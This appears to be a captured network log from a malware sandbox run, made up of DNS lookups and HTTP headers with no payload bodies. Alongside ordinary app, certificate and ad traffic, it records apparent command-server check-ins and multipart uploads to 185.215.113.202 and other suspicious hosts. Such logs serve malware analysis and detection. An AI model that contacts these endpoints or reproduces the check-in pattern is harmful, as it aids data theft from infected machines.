GEThttp://crl.certum.pl/ctnca.crlRemote address:104.110.191.19:80RequestGET /ctnca.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.certum.pl
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-crl
Content-Length: 619
Last-Modified: Thu, 08 Oct 2020 12:58:27 GMT
Accept-Ranges: bytes
Cache-Control: public, max-age=60
Date: Mon, 06 Sep 2021 09:35:50 GMT
Connection: keep-alive
-
DNSyandex.crl.certum.plRemote address:8.8.8.8:53Requestyandex.crl.certum.plIN AResponseyandex.crl.certum.plIN CNAMEcrl.akamai.certum.plcrl.akamai.certum.plIN CNAMEcrl.certum.pl.edgekey.netcrl.certum.pl.edgekey.netIN CNAMEe83157.dscb.akamaiedge.nete83157.dscb.akamaiedge.netIN A104.110.191.14e83157.dscb.akamaiedge.netIN A104.110.191.19
-
DNShumanverify.netRemote address:8.8.8.8:53Requesthumanverify.netIN AResponsehumanverify.netIN A3.225.87.211
-
GEThttp://yandex.crl.certum.pl/ycasha2.crlRemote address:104.110.191.14:80RequestGET /ycasha2.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: yandex.crl.certum.pl
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-crl
Content-Length: 2024
Strict-Transport-Security: max-age=63072000; includeSubDomains
Last-Modified: Mon, 06 Sep 2021 04:03:44 GMT
Accept-Ranges: bytes
Cache-Control: public, max-age=60
Date: Mon, 06 Sep 2021 09:35:51 GMT
Connection: keep-alive
-
POSThttp://requestimmersive.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpegRemote address:162.0.220.187:80RequestPOST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimmersive.com
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.21.1
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Date: Mon, 06 Sep 2021 09:35:53 GMT
-
POSThttp://185.215.113.202/PmVc3sOf/index.phpRemote address:185.215.113.202:80RequestPOST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:36:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://185.215.113.202/PmVc3sOf/index.php?scr=1Remote address:185.215.113.202:80RequestPOST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----7a4c3134501cc2e0f8acff7fc4044a9c
Host: 185.215.113.202
Content-Length: 176364
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:36:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
DNSvexacion.comRemote address:8.8.8.8:53Requestvexacion.comIN AResponsevexacion.comIN A139.45.197.236
-
GEThttp://vexacion.com/afu.php?zoneid=1851483Remote address:139.45.197.236:80RequestGET /afu.php?zoneid=1851483 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: vexacion.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:38:14 GMT
Content-Type: text/html; charset=utf8
Transfer-Encoding: chunked
Connection: keep-alive
X-Trace-Id: 38fd4edb259eecfd26a561a10dac2125
Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
Access-Control-Max-Age: 86400
Pragma: no-cache
Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
Expires: Tue, 11 Jan 1994 10:00:00 GMT
Timing-Allow-Origin: *
Set-Cookie: OAID=4cc469f0e2f942c89a6ac637bd56453d; expires=Tue, 06 Sep 2022 09:38:14 GMT; path=/
Set-Cookie: oaidts=1630921094; expires=Tue, 06 Sep 2022 09:38:14 GMT; path=/
Set-Cookie: syncedCookie=; expires=Tue, 10 Nov 2009 23:00:00 GMT
Strict-Transport-Security: max-age=1
X-Content-Type-Options: nosniff
Timing-Allow-Origin: *
Content-Encoding: gzip
-
GEThttp://vexacion.com/favicon.icoRemote address:139.45.197.236:80RequestGET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: vexacion.com
Connection: Keep-Alive
Cookie: OAID=4cc469f0e2f942c89a6ac637bd56453d; oaidts=1630921094
ResponseHTTP/1.1 204 No Content
Server: nginx
Date: Mon, 06 Sep 2021 09:38:19 GMT
Connection: keep-alive
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
-
DNScollect.installeranalytics.comRemote address:8.8.8.8:53Requestcollect.installeranalytics.comIN AResponsecollect.installeranalytics.comIN A3.209.18.1collect.installeranalytics.comIN A3.232.36.43
-
DNS113.t.keepitpumpin.ioRemote address:8.8.8.8:53Request113.t.keepitpumpin.ioIN AResponse113.t.keepitpumpin.ioIN A212.83.164.166
-
DNS112.t.keepitpumpin.ioRemote address:8.8.8.8:53Request112.t.keepitpumpin.ioIN AResponse112.t.keepitpumpin.ioIN A212.83.164.37
-
DNS110.t.keepitpumpin.ioRemote address:8.8.8.8:53Request110.t.keepitpumpin.ioIN AResponse110.t.keepitpumpin.ioIN A163.172.204.15
-
POSThttp://185.215.113.202/PmVc3sOf/index.phpRemote address:185.215.113.202:80RequestPOST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:39:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://185.215.113.202/PmVc3sOf/index.php?scr=1Remote address:185.215.113.202:80RequestPOST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----5f798f5a3adcaeeca1ece15e954ae46f
Host: 185.215.113.202
Content-Length: 48303
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:39:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
DNScrl.rootca1.amazontrust.comRemote address:8.8.8.8:53Requestcrl.rootca1.amazontrust.comIN AResponsecrl.rootca1.amazontrust.comIN A52.222.137.7crl.rootca1.amazontrust.comIN A52.222.137.31crl.rootca1.amazontrust.comIN A52.222.137.192crl.rootca1.amazontrust.comIN A52.222.137.161
-
GEThttp://crl.rootca1.amazontrust.com/rootca1.crlRemote address:52.222.137.7:80RequestGET /rootca1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.rootca1.amazontrust.com
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-crl
Content-Length: 493
Connection: keep-alive
Date: Thu, 24 Jun 2021 18:11:44 GMT
Last-Modified: Thu, 24 Jun 2021 18:05:55 GMT
ETag: "743a25b75f830c0754c9e362c7454acb"
Cache-Control: public
Expires: Tue, 21 Jun 2022 00:00:00 GMT
x-amz-version-id: st8Fn0XT6jzZdZTl8McDLRRA0Tpnr3bW
Accept-Ranges: bytes
Server: AmazonS3
X-Cache: Hit from cloudfront
Via: 1.1 559401aa49f4b835c1816ad004278e3e.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS50-C1
X-Amz-Cf-Id: PyZz2Q_SyyruhjoTQczHMwyVrixhoVDe1FFLgPYP9Coc1CQLSNGhTA==
Age: 6362894
-
DNScrl.sca1b.amazontrust.comRemote address:8.8.8.8:53Requestcrl.sca1b.amazontrust.comIN AResponsecrl.sca1b.amazontrust.comIN A13.227.211.148crl.sca1b.amazontrust.comIN A13.227.211.220crl.sca1b.amazontrust.comIN A13.227.211.185crl.sca1b.amazontrust.comIN A13.227.211.126
-
GEThttp://crl.sca1b.amazontrust.com/sca1b.crlRemote address:13.227.211.148:80RequestGET /sca1b.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.sca1b.amazontrust.com
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-crl
Content-Length: 1417226
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: max-age=10800
Date: Mon, 06 Sep 2021 07:32:35 GMT
Expires: Mon, 06 Sep 2021 10:32:35 GMT
Last-Modified: Sun, 05 Sep 2021 23:38:24 GMT
Server: ECS (oxr/831A)
ETag: "3727372073"
X-Cache: Hit from cloudfront
Via: 1.1 f9d671af272d3b5b3c683203ae8f4cc8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS54-C1
X-Amz-Cf-Id: Pbwg7QiHko_MBN_R21nOUJc6VF2HJJslyMbS-sj5Bfc_Dz5DT5fiQQ==
Age: 7643
-
DNScollect.installeranalytics.comRemote address:8.8.8.8:53Requestcollect.installeranalytics.comIN AResponsecollect.installeranalytics.comIN A3.209.18.1collect.installeranalytics.comIN A3.232.36.43
-
DNSampcid.google.comRemote address:8.8.8.8:53Requestampcid.google.comIN AResponseampcid.google.comIN A142.250.179.174
-
POSThttps://collect.installeranalytics.com/Remote address:3.209.18.1:443RequestPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 6.1.7601 Service Pack 1; x64)
Host: collect.installeranalytics.com
Content-Length: 176
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Cache-control: no-cache="set-cookie"
Date: Mon, 06 Sep 2021 09:40:10 GMT
Set-Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7;PATH=/;MAX-AGE=600
Set-Cookie: AWSELBCORS=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7;PATH=/;MAX-AGE=600;SECURE;SAMESITE=None
X-Powered-By: Express
Content-Length: 0
Connection: keep-alive
-
DNS111.t.keepitpumpin.ioRemote address:8.8.8.8:53Request111.t.keepitpumpin.ioIN AResponse111.t.keepitpumpin.ioIN A212.83.141.61
-
DNSlumtest.comRemote address:8.8.8.8:53Requestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myipRemote address:3.94.72.89:80RequestGET /myip HTTP/1.1
Host: lumtest.com
Connection: keep-alive
Accept: */*
User-Agent: kidsdaemon/10.8.24 CFNetwork/1128.0.1 Darwin/19.6.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:41:48 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 12
Connection: keep-alive
Cache-Control: no-store
-
DNScl4.apple.comRemote address:8.8.8.8:53Requestcl4.apple.comIN AResponsecl4.apple.comIN CNAMEcl4-cdn.origin-apple.com.akadns.netcl4-cdn.origin-apple.com.akadns.netIN CNAMEcl4-cdn-us.origin-apple.com.akadns.netcl4-cdn-us.origin-apple.com.akadns.netIN CNAMEcl4.g.aaplimg.comcl4.g.aaplimg.comIN A17.253.53.201cl4.g.aaplimg.comIN A17.253.53.206
-
DNSiphone-ld.apple.comRemote address:8.8.8.8:53Requestiphone-ld.apple.comIN AResponseiphone-ld.apple.comIN CNAMEiphone-ld.origin-apple.com.akadns.netiphone-ld.origin-apple.com.akadns.netIN CNAMEiphone-ld.apple.com-v1.edgesuite.netiphone-ld.apple.com-v1.edgesuite.netIN CNAMEa1931.dscgi3.akamai.neta1931.dscgi3.akamai.netIN A2.22.22.209a1931.dscgi3.akamai.netIN A2.22.22.211
-
DNSapi-edge.apps.apple.comRemote address:8.8.8.8:53Requestapi-edge.apps.apple.comIN AResponseapi-edge.apps.apple.comIN CNAMEapi-edge.apps-lb.itunes-apple.com.akadns.netapi-edge.apps-lb.itunes-apple.com.akadns.netIN CNAMEapi-edge.apps.apple.com.edgekey.netapi-edge.apps.apple.com.edgekey.netIN CNAMEe673.dscx.akamaiedge.nete673.dscx.akamaiedge.netIN A104.80.224.24
-
DNSlumtest.comRemote address:8.8.8.8:53Requestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myipRemote address:3.94.40.55:80RequestGET /myip HTTP/1.1
Host: lumtest.com
Connection: keep-alive
Accept: */*
User-Agent: kidsdaemon/10.8.24 CFNetwork/1128.0.1 Darwin/19.6.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:41:49 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 12
Connection: keep-alive
Cache-Control: no-store
-
DNSaax-us-east.amazon-adsystem.comRemote address:8.8.8.8:53Requestaax-us-east.amazon-adsystem.comIN AResponseaax-us-east.amazon-adsystem.comIN A52.94.231.7
-
DNScombine.urbanairship.comRemote address:8.8.8.8:53Requestcombine.urbanairship.comIN AResponsecombine.urbanairship.comIN A35.190.53.75
-
DNSsaa.cbsi.comRemote address:8.8.8.8:53Requestsaa.cbsi.comIN AResponsesaa.cbsi.comIN CNAMEcbsi.com.ssl.sc.omtrdc.netcbsi.com.ssl.sc.omtrdc.netIN A13.36.218.177cbsi.com.ssl.sc.omtrdc.netIN A15.236.176.210cbsi.com.ssl.sc.omtrdc.netIN A15.188.95.229
-
DNSfirebaselogging-pa.googleapis.comRemote address:8.8.8.8:53Requestfirebaselogging-pa.googleapis.comIN AResponsefirebaselogging-pa.googleapis.comIN A142.251.36.42
-
DNSlumtest.comRemote address:8.8.8.8:53Requestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myipRemote address:3.94.72.89:80RequestGET /myip HTTP/1.1
Host: lumtest.com
Connection: keep-alive
Accept: */*
User-Agent: kidsdaemon/10.8.24 CFNetwork/1128.0.1 Darwin/19.6.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:41:50 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 12
Connection: keep-alive
Cache-Control: no-store
-
DNStags.tiqcdn.comRemote address:8.8.8.8:53Requesttags.tiqcdn.comIN AResponsetags.tiqcdn.comIN CNAMEtags.tiqcdn.com.edgekey.nettags.tiqcdn.com.edgekey.netIN CNAMEe8091.a.akamaiedge.nete8091.a.akamaiedge.netIN A104.80.228.241
-
DNSdoppler-config.cbsivideo.comRemote address:8.8.8.8:53Requestdoppler-config.cbsivideo.comIN AResponsedoppler-config.cbsivideo.comIN CNAMEvtg-global.cbsi.map.fastly.netvtg-global.cbsi.map.fastly.netIN A151.101.37.188
-
DNSaax-us-east.amazon-adsystem.comRemote address:8.8.8.8:53Requestaax-us-east.amazon-adsystem.comIN AResponseaax-us-east.amazon-adsystem.comIN A52.46.155.118
-
DNSconfig.claspws.tvRemote address:8.8.8.8:53Requestconfig.claspws.tvIN AResponseconfig.claspws.tvIN A3.18.68.182config.claspws.tvIN A3.130.47.69config.claspws.tvIN A18.190.78.55
-
DNSsdf-api.cbssports.cloudRemote address:8.8.8.8:53Requestsdf-api.cbssports.cloudIN AResponsesdf-api.cbssports.cloudIN CNAMEd2w9zh6g7ghxhm.cloudfront.netd2w9zh6g7ghxhm.cloudfront.netIN A52.222.139.66d2w9zh6g7ghxhm.cloudfront.netIN A52.222.139.67d2w9zh6g7ghxhm.cloudfront.netIN A52.222.139.55d2w9zh6g7ghxhm.cloudfront.netIN A52.222.139.11
-
DNSint.akisinn.infoRemote address:8.8.8.8:53Requestint.akisinn.infoIN AResponseint.akisinn.infoIN A34.95.120.195
-
DNSvideo-api.cbssports.comRemote address:8.8.8.8:53Requestvideo-api.cbssports.comIN AResponsevideo-api.cbssports.comIN CNAMEvideo-api.prod.video.cbssports.cloudvideo-api.prod.video.cbssports.cloudIN CNAMEd2ju62qyo6elnj.cloudfront.netd2ju62qyo6elnj.cloudfront.netIN A13.227.222.115d2ju62qyo6elnj.cloudfront.netIN A13.227.222.105d2ju62qyo6elnj.cloudfront.netIN A13.227.222.11d2ju62qyo6elnj.cloudfront.netIN A13.227.222.85
-
DNSzned65ynwxvsuk9lf-cbs.siteintercept.qualtrics.comRemote address:8.8.8.8:53Requestzned65ynwxvsuk9lf-cbs.siteintercept.qualtrics.comIN AResponsezned65ynwxvsuk9lf-cbs.siteintercept.qualtrics.comIN CNAMEsiteintercept.qprod2.netsiteintercept.qprod2.netIN CNAMEprodlb.siteintercept.qualtrics.com.cdn.cloudflare.netprodlb.siteintercept.qualtrics.com.cdn.cloudflare.netIN A104.17.208.240prodlb.siteintercept.qualtrics.com.cdn.cloudflare.netIN A104.17.209.240
-
DNSremote-data.urbanairship.comRemote address:8.8.8.8:53Requestremote-data.urbanairship.comIN AResponseremote-data.urbanairship.comIN A35.201.74.116
-
DNSxp.apple.comRemote address:8.8.8.8:53Requestxp.apple.comIN AResponsexp.apple.comIN CNAMExp.itunes-apple.com.akadns.netxp.itunes-apple.com.akadns.netIN CNAMExp.apple.com.edgekey.netxp.apple.com.edgekey.netIN CNAMEe17437.dscb.akamaiedge.nete17437.dscb.akamaiedge.netIN A104.123.41.212
-
DNSsp.auth.adobe.comRemote address:8.8.8.8:53Requestsp.auth.adobe.comIN AResponsesp.auth.adobe.comIN CNAMEsp-gw.adobepass.comsp-gw.adobepass.comIN CNAMEapi-gateway-ap-uw2.adobe.ioapi-gateway-ap-uw2.adobe.ioIN A34.209.227.167api-gateway-ap-uw2.adobe.ioIN A44.224.76.139api-gateway-ap-uw2.adobe.ioIN A34.217.172.40api-gateway-ap-uw2.adobe.ioIN A44.233.218.216api-gateway-ap-uw2.adobe.ioIN A44.240.219.209api-gateway-ap-uw2.adobe.ioIN A35.163.10.93api-gateway-ap-uw2.adobe.ioIN A35.167.202.181api-gateway-ap-uw2.adobe.ioIN A35.160.230.221
-
DNSlumtest.comRemote address:8.8.8.8:53Requestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myipRemote address:3.94.40.55:80RequestGET /myip HTTP/1.1
Host: lumtest.com
Connection: keep-alive
Accept: */*
User-Agent: kidsdaemon/10.8.24 CFNetwork/1128.0.1 Darwin/19.6.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:41:52 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 12
Connection: keep-alive
Cache-Control: no-store
-
DNSaax-us-east.amazon-adsystem.comRemote address:8.8.8.8:53Requestaax-us-east.amazon-adsystem.comIN AResponseaax-us-east.amazon-adsystem.comIN A209.54.178.200
-
DNSwww.cbssports.comRemote address:8.8.8.8:53Requestwww.cbssports.comIN AResponsewww.cbssports.comIN CNAMEsports-global-ipv4.cbsi.map.fastly.netsports-global-ipv4.cbsi.map.fastly.netIN A151.101.37.188
-
DNSbakery.cbsi.videoRemote address:8.8.8.8:53Requestbakery.cbsi.videoIN AResponsebakery.cbsi.videoIN CNAMEbakery.dot-video.ns1.cbsivideo.combakery.dot-video.ns1.cbsivideo.comIN CNAMEvtg.cbsi.map.fastly.netvtg.cbsi.map.fastly.netIN A199.232.37.188
-
DNS438b44e68a18a815aaf4aa6ab.litix.ioRemote address:8.8.8.8:53Request438b44e68a18a815aaf4aa6ab.litix.ioIN AResponse438b44e68a18a815aaf4aa6ab.litix.ioIN CNAMEa4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.coma4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.225.211.88a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.209.245.140a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A34.202.87.223a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A35.168.81.87a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A52.202.125.30a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.214.248.99
-
DNSsportshub.cbsistatic.comRemote address:8.8.8.8:53Requestsportshub.cbsistatic.comIN AResponsesportshub.cbsistatic.comIN CNAMEsports-global.cbsi.map.fastly.netsports-global.cbsi.map.fastly.netIN A151.101.37.188
-
DNSsearchengineads.netRemote address:8.8.8.8:53Requestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSsearchengineads.netRemote address:8.8.8.8:53Requestsearchengineads.netIN AResponsesearchengineads.netIN A103.63.108.18
-
DNSa.adtng.comRemote address:8.8.8.8:53Requesta.adtng.comIN AResponsea.adtng.comIN A216.18.168.166
-
DNSaccounts.google.comRemote address:8.8.8.8:53Requestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSupdate.googleapis.comRemote address:8.8.8.8:53Requestupdate.googleapis.comIN AResponseupdate.googleapis.comIN A142.250.179.195
-
DNSncsa.sdapi.ioRemote address:8.8.8.8:53Requestncsa.sdapi.ioIN AResponsencsa.sdapi.ioIN CNAMEn.sdapi.io.edgekey.netn.sdapi.io.edgekey.netIN CNAMEe4330.dscx.akamaiedge.nete4330.dscx.akamaiedge.netIN A104.73.134.42
-
DNStranslate.googleapis.comRemote address:8.8.8.8:53Requesttranslate.googleapis.comIN AResponsetranslate.googleapis.comIN A142.250.179.138
-
DNSaccounts.google.comRemote address:8.8.8.8:53Requestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSexample.orgRemote address:8.8.8.8:53Requestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
DNSmatch.sharethrough.comRemote address:8.8.8.8:53Requestmatch.sharethrough.comIN AResponsematch.sharethrough.comIN CNAMEmatch-eu-central-1-ecs.sharethrough.commatch-eu-central-1-ecs.sharethrough.comIN A18.184.122.71match-eu-central-1-ecs.sharethrough.comIN A54.93.151.69match-eu-central-1-ecs.sharethrough.comIN A35.158.223.21match-eu-central-1-ecs.sharethrough.comIN A3.126.175.244
-
DNS438b44e68a18a815aaf4aa6ab.litix.ioRemote address:8.8.8.8:53Request438b44e68a18a815aaf4aa6ab.litix.ioIN AResponse438b44e68a18a815aaf4aa6ab.litix.ioIN CNAMEa4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.coma4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.225.211.88a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.209.245.140a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A34.202.87.223a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A35.168.81.87a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A52.202.125.30a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.214.248.99
-
DNSclients3.google.comRemote address:8.8.8.8:53Requestclients3.google.comIN AResponseclients3.google.comIN CNAMEclients.l.google.comclients.l.google.comIN A142.250.179.174
-
DNSsb.scorecardresearch.comRemote address:8.8.8.8:53Requestsb.scorecardresearch.comIN AResponsesb.scorecardresearch.comIN A52.222.139.90sb.scorecardresearch.comIN A52.222.139.77sb.scorecardresearch.comIN A52.222.139.23sb.scorecardresearch.comIN A52.222.139.45
-
DNSinappcheck.itunes.apple.comRemote address:8.8.8.8:53Requestinappcheck.itunes.apple.comIN AResponseinappcheck.itunes.apple.comIN CNAMEinappcheck-lb.itunes-apple.com.akadns.netinappcheck-lb.itunes-apple.com.akadns.netIN CNAMEinappcheck.itunes.apple.com.edgekey.netinappcheck.itunes.apple.com.edgekey.netIN CNAMEe69896.dscapi6.akamaiedge.nete69896.dscapi6.akamaiedge.netIN A96.16.53.203e69896.dscapi6.akamaiedge.netIN A96.16.53.206
-
DNSerrors.imrworldwide.comRemote address:8.8.8.8:53Requesterrors.imrworldwide.comIN AResponseerrors.imrworldwide.comIN CNAMEerror-blue-bifrost.uw2-blue.nielsendigital.neterror-blue-bifrost.uw2-blue.nielsendigital.netIN A100.20.12.30error-blue-bifrost.uw2-blue.nielsendigital.netIN A52.13.245.49error-blue-bifrost.uw2-blue.nielsendigital.netIN A52.26.115.248
-
DNSimasdk.googleapis.comRemote address:8.8.8.8:53Requestimasdk.googleapis.comIN AResponseimasdk.googleapis.comIN A142.250.179.202
-
GEThttp://imasdk.googleapis.com/native/sdkloader/native_sdk_v3.html?app=H443NM7F8H.CBSSportsApp&hl=en&mt=2&omv=1.3.3-google_20200427&sdk_version=i.3.14.4&wvr=2Remote address:142.250.179.202:80RequestGET /native/sdkloader/native_sdk_v3.html?app=H443NM7F8H.CBSSportsApp&hl=en&mt=2&omv=1.3.3-google_20200427&sdk_version=i.3.14.4&wvr=2 HTTP/1.1
Host: imasdk.googleapis.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/html
Content-Length: 3484
Date: Mon, 06 Sep 2021 09:42:11 GMT
Expires: Mon, 06 Sep 2021 09:42:11 GMT
Cache-Control: private, max-age=900, stale-while-revalidate=3600
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
-
DNS438b44e68a18a815aaf4aa6ab.litix.ioRemote address:8.8.8.8:53Request438b44e68a18a815aaf4aa6ab.litix.ioIN AResponse438b44e68a18a815aaf4aa6ab.litix.ioIN CNAMEa4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.coma4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A35.168.81.87a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A52.202.125.30a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.225.211.88a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.214.248.99a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A3.209.245.140a4d6c1c8368a911ea98860aeb4e6dc37-182063218.us-east-1.elb.amazonaws.comIN A34.202.87.223
-
DNSapi2.branch.ioRemote address:8.8.8.8:53Requestapi2.branch.ioIN AResponseapi2.branch.ioIN A13.227.222.103api2.branch.ioIN A13.227.222.111api2.branch.ioIN A13.227.222.44api2.branch.ioIN A13.227.222.30
-
DNSsp.auth.adobe.comRemote address:8.8.8.8:53Requestsp.auth.adobe.comIN AResponsesp.auth.adobe.comIN CNAMEsp-gw.adobepass.comsp-gw.adobepass.comIN CNAMEapi-gateway-ap-uw2.adobe.ioapi-gateway-ap-uw2.adobe.ioIN A44.240.219.209api-gateway-ap-uw2.adobe.ioIN A35.160.230.221api-gateway-ap-uw2.adobe.ioIN A34.209.227.167api-gateway-ap-uw2.adobe.ioIN A34.217.172.40api-gateway-ap-uw2.adobe.ioIN A35.163.10.93api-gateway-ap-uw2.adobe.ioIN A34.223.151.158api-gateway-ap-uw2.adobe.ioIN A44.241.81.187api-gateway-ap-uw2.adobe.ioIN A34.218.159.207
-
DNSdoppler-error.cbsivideo.comRemote address:8.8.8.8:53Requestdoppler-error.cbsivideo.comIN AResponsedoppler-error.cbsivideo.comIN CNAMEvtg-global.cbsi.map.fastly.netvtg-global.cbsi.map.fastly.netIN A151.101.37.188
-
DNSaax-us-east.amazon-adsystem.comRemote address:8.8.8.8:53Requestaax-us-east.amazon-adsystem.comIN AResponseaax-us-east.amazon-adsystem.comIN A209.54.176.34
-
